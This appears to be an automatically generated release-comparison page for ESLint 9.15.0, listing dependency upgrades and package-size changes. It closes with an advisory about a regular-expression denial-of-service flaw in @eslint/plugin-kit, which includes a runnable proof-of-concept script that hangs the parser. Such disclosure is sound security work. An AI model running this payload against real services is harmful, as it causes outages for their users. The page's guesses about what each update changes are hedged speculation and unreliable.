ESLint 9.15.0 represents an incremental update over version 9.14.0, refining this popular JavaScript linting tool. Developers leveraging ESLint to maintain code quality and consistency will find subtle but potentially impactful changes in this release.
In the realm of dependencies, several key shifts are noticeable. The @eslint/js dependency has been updated to 9.15.0, aligning with the core ESLint version and likely incorporating new or refined ECMAScript syntax support and rules. @eslint/core jumps from version 0.7.0 to 0.9.0, suggesting internal architectural improvements and rule processing enhancements, potentially affecting performance and extensibility. @eslint/eslintrc moves from 3.1.0 to 3.2.0, hinting at adjustments in configuration file handling and overrides. The @eslint/plugin-kit is updated from 0.2.0 to 0.2.3. Additionally, @eslint/config-array is updated from 0.18.0 to 0.19.0, and @eslint/json rises from 0.5.0 to 0.6.0. These probably introduce finer-grained control over rule configuration and extensibility options for plugin developers.
One important difference is the removal of text-table from the dependencies of the current version.
While most development dependencies remain consistent, indicating a focus on stability, the switch from cross-spawn:^7.0.2 to cross-spawn:^7.0.5 addresses potential cross-platform compatibility issues during development.
Overall, version 9.15.0 provides evolutionary refinements enhancing ESLint's core functionalities. Developers should review the changelog associated with the updated @eslint/* packages to fully understand the specific changes regarding rule behavior, configuration options, and potential performance gains. Package size slightly increased, with the unpackded size going from 3337162 to 3341911, and the number of files is 420 in the previous and 423 in the latest version, so update should be tested.
All the vulnerabilities related to the version 9.15.0 of the package
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.